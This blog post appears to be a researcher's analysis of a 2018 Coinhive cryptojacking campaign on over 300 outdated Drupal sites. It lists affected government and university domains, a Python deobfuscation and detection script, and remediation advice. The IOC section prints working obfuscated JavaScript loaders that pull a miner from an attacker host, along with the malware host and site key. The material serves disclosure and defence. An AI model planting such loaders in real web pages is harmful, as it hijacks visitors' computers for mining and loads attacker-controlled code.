Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator: both were running an outdated and vulnerable version of the Drupal content management system. After analysing the IOCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many of those discovered were government and university sites from all over the world.
#Coinhive found on the website of the San Diego Zoo (@sandiegozoo) in the latest high-profile case of #cryptojacking. pic.twitter.com/B3rd2Q5uVA
— Bad Packets Report (@bad_packets) May 4, 2018
Similar story here — #Coinhive injected via the same #JavaScript library (jquery.once.js?v=1.2) pointing to http://vuuwd[.]com/t.js
Also an outdated #Drupal installation. pic.twitter.com/fXv2sBsIVB
— Bad Packets Report (@bad_packets) May 5, 2018
Digging a little deeper into the cryptojacking campaign, I found that Coinhive was injected via the same method in both cases: the malicious code had been inserted into the “/misc/jquery.once.js?v=1.2” JavaScript library, a file that ships with Drupal core. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all of the infected sites pointed to the same domain and used the same Coinhive site key.

Once the code was deobfuscated, the reference to “http://vuuwd[.]com/t.js” was plain to see. Visiting that URL revealed the ugly truth: a slightly throttled implementation of Coinhive.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by inspecting the traffic in Fiddler. This was a bit redundant, as the high CPU usage was already a clear indicator that cryptocurrency mining (hashing) was taking place. Regardless, it’s always worth checking, since Coinhive changed its platform and how it handles abuse after the Brian Krebs investigation.
After contacting the San Diego Zoo to advise them to remove the malware, I took a closer look at the domain name vuuwd[.]com.
While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. pic.twitter.com/IEeqXrAKTT
— Bad Packets Report (@bad_packets) May 4, 2018
While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at hand, vuuwd[.]com.
Looking at the historical DNS records on @securitytrails we find https://t.co/nT3NhaZotQ was recently involved in Monero (XMR) mining operations. So it seems fitting to continue the trend with today's cryptojacking incident using #Coinhive. pic.twitter.com/GfmgUy2gWc
— Bad Packets Report (@bad_packets) May 4, 2018
This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was previously used in Monero (XMR) mining operations via mineXMR.com. While it’s somewhat unusual that they’d switch from a mining pool with a 1% fee to Coinhive, which takes a 30% cut of all mining proceeds, that was the choice they made.
Now that the IOCs were clearly established, I turned to PublicWWW to locate other affected sites. My initial query yielded over 100,000 sites that reference the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the exact snippet with a regular expression via PublicWWW’s snipex function.
Once I had the list of potentially affected sites, I began scanning them for IOCs, looking for the obfuscated Coinhive loader. This was done using tools developed for me by Dan Snider, who has frequently provided invaluable assistance to my research; I recommend reading more about his work here.
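The deobfuscation described above and the IOC scan over candidate sites can be reproduced in a few lines of Python. What follows is an added example written for this page, not the author's tooling or Dan Snider's. It undoes the two obfuscation tricks visible in the published IOC snippets (the `\xNN` hex escapes that hide the property names and payload URL of the first-stage loader, and the `b()` helper of the second stage, which keeps every other character of a decoy string and reverses what is left), then checks the cleartext for the campaign's domain and site key. The sample inputs are constructed: the first two are the loader fragments from the IOC section with their backslashes restored, the `CoinHive.Anonymous` line assumes the shape of Coinhive's public API and was not seen on the page, and the "benign" fragment is written in the style of jquery.once.js rather than copied from Drupal.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the IOC section of the post.
IOC_DOMAIN = "vuuwd.com"
IOC_SITE_KEY = "KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6"

# Stage 1 hides property names and the payload URL as \xNN escapes.
_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Stage 2 wraps every hidden string in a call to its helper b("...").
_B_CALL = re.compile(r"""\bb\((['"])(.*?)\1\)""")
_URL = re.compile(r"""https?://[^\s'"<>()]+""")


def decode_hex_escapes(js: str) -> str:
    """Replace JavaScript \\xNN escapes with the characters they encode."""
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), js)


def decode_interleaved(s: str) -> str:
    """Reimplementation of the loader's b() and h(): b() keeps the characters
    at odd positions of the decoy string, h() reverses what is left."""
    return s[1::2][::-1]


def deobfuscate(js: str) -> str:
    """Undo both layers so the script reads as the attacker wrote it."""
    js = decode_hex_escapes(js)
    return _B_CALL.sub(lambda m: repr(decode_interleaved(m.group(2))), js)


def scan(js: str) -> dict:
    """Deobfuscate one JavaScript file and report campaign indicators.

    Returns the URLs it references, which indicators matched, and a count of
    hex escapes in the raw text: a dense run of them inside a Drupal core
    file is suspicious on its own, even if the domain or key has changed."""
    clear = deobfuscate(js)
    urls = _URL.findall(clear)
    hosts = {urlsplit(u).hostname for u in urls}
    hits = []
    if IOC_DOMAIN in hosts:
        hits.append(IOC_DOMAIN)
    if IOC_SITE_KEY in clear:
        hits.append(IOC_SITE_KEY)
    return {
        "urls": urls,
        "hits": hits,
        "infected": bool(hits),
        "hex_escapes": len(_HEX_ESCAPE.findall(js)),
    }


# Sample inputs (constructed for this example). STAGE1_LOADER and
# STAGE2_FRAGMENT are the published IOC snippets with backslashes restored;
# MINER_INIT assumes Coinhive's API shape and BENIGN imitates jquery.once.js.
STAGE1_LOADER = r"""var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);"""
STAGE2_FRAGMENT = r"""var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){}"""
MINER_INIT = "var miner=new CoinHive.Anonymous('KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6',{throttle:0.2});miner.start();"
BENIGN = "(function($){$.fn.once=function(id,fn){return this.filter(':not(.'+id+'-processed)').addClass(id+'-processed').each(fn);};})(jQuery);"

if __name__ == "__main__":
    for name, sample in [("stage1", STAGE1_LOADER), ("stage2", STAGE2_FRAGMENT),
                         ("miner", MINER_INIT), ("benign", BENIGN)]:
        result = scan(sample)
        print(f"{name:7} infected={result['infected']} hits={result['hits']} urls={result['urls']}")
    print(deobfuscate(STAGE2_FRAGMENT))
```

In practice you would feed `scan()` the body of `/misc/jquery.once.js` fetched from each candidate host, or run it over every `.js` file under a Drupal docroot during incident response. The hex-escape count is the generic signal: Drupal's shipped copy of jquery.once.js contains none, so any file with dozens of them warrants a look even after the operator rotates domain and site key.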
The big reveal
After the scan completed, the full scope of this cryptojacking campaign was established: 348 infected websites. Using the bulk scan feature of urlscan.io, it became clear that all of these sites were running outdated and vulnerable versions of the Drupal content management system.
The affected sites were spread across hosting providers and countries, and no specific provider or country appeared to be targeted. The largest number of unique domains were located in the United States and hosted by Amazon.
Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.
Government sites affected
The National Labor Relations Board – US federal agency
http://www.nlrb.gov
Government of Chihuahua, Mexico
chihuahua.gob.mx
City of Marion, Ohio
http://www.marionohio.us
Arizona Board of Behavioral Health Examiners
azbbhe.us
Social Security Institute of the State of Mexico and Municipalities
issemym.gob.mx
Turkish Revenue Administration – Aydın Tax Office
aydinvdb.gov.tr
Procalidad – “The Project Improvement of Higher Education Quality” – Peru
procalidad.gob.pe
Matzikama Municipality
http://www.matzikamamun.co.za
UMBRIA Special Reconstruction Office
http://www.sismaumbria2016.it
University / school sites affected
University of Aleppo
alepuniv.edu.sy
College of Biblical Studies
cbshouston.edu
IOHANES – University of Balamand
iohanes.balamand.edu.lb
Ringling College of Art and Design
http://www.ringling.edu
Vidyalankar Institute of Technology
vit.edu.in
University of Batangas
ub.edu.ph
Asia Pacific Institute of Information Technology (APIIT)
http://www.apiit.edu.my
Management Development Institute of Singapore in Tashkent
mdis.uz
Islamic Azad University of the Semnan branch
http://www.semnaniau.ac.ir
Tan Dan Secondary School
thcstttandan.edu.vn
Other sites affected
The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to the infected JavaScript library (jquery.once.js?v=1.2) on each site is included. In addition, the title tag (name/description) of each site has been extracted and is listed in the sheet.
2018-05-07 update
Additional websites have been identified and added to the Google Sheet. Notable sites include those of Lenovo, UCLA, D-Link (Brazil), and the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC), a US federal government agency.

.@UCLA Atmospheric & Oceanic Sciences website is also affected by this #cryptojacking campaign. pic.twitter.com/TmJu1IMGpr
— Bad Packets Report (@bad_packets) May 7, 2018
The websites of UCLA and D-Link Brazil were also found to be injecting Coinhive.

For some odd reason, the operator of this cryptojacking campaign chose to serve the payload with a self-signed SSL certificate instead of one issued by a trusted certificate authority (CA). This could easily (and freely) have been done using Let's Encrypt, but was not. Because browsers refuse to fetch a script over a TLS connection with an untrusted certificate, the cryptojacking payload fails to load wherever it is referenced via HTTPS.
So you've managed to compromise the website of a US federal agency, but you didn't use a trusted SSL cert for delivering your payload. Because of this, the connection to your server is blocked and #Coinhive fails to load. pic.twitter.com/cq5gqVupQy
— Bad Packets Report (@bad_packets) May 6, 2018
In addition to the self-signed SSL cert misstep, some sites, such as that of the Office of Inspector General of the EEOC, were injected with a reference to the non-secure (http://) version of the script. Where the host page is served over HTTPS, browsers block an http:// script as active mixed content, so this is yet another blunder that hinders the effectiveness of the campaign: Coinhive does not load.
Another compromised federal government website has been found in this #cryptojacking campaign. This time it's the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC). Fortunately, Coinhive fails to load because payload is not injected via HTTPS. pic.twitter.com/2Ow95vASyt
— Bad Packets Report (@bad_packets) May 7, 2018
2018-05-16 update
This cryptojacking campaign continues: the malware host vuuwd[.]com has been restored and is now serving a new Coinhive site key.
The malware host in the Drupal #cryptojacking campaign is back online. #PRTG shows access was restored to vuuwd[.]com around 5:00 PM UTC today. pic.twitter.com/tUScqE5kz0
— Bad Packets Report (@bad_packets) May 16, 2018
The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story.
IOCs
Payload URLs:
http://vuuwd[.]com/t.js
https://vuuwd[.]com/t.js (self-signed SSL cert issued by "WIN-QNCIT36VCLJ")

Malware host IP:
162.222.213.236

Injected loader, HTTP variant (found in /misc/jquery.once.js?v=1.2):
var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

Injected loader, HTTPS variant:
var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Second-stage loader (strings hidden via the b()/h() helpers):
;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();

Coinhive site key:
KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6
Closing Remarks
We’ve seen plenty of examples of Drupalgeddon 2 (SA-CORE-2018-002, CVE-2018-7600) being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website: the injected code in misc/jquery.once.js stays in place until you remove it or restore the file from a clean copy of Drupal core, and since the vulnerability gives the attacker code execution on the server, you may need to take further remediation steps to find anything else they left behind.
To stop cryptojacking in your browser, I recommend the minerBlock extension.
If you block malicious activity at the network level with tools such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.
If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets
Also, be sure to check out my Mirai-like botnet data website!
Thanks guys!
Implemented:
https://discourse.pi-hole.net/t/adding-cryptojacking-campaign-drupal-sites-to-main-blocklist/9439/4
Cheers,
deHakkelaar.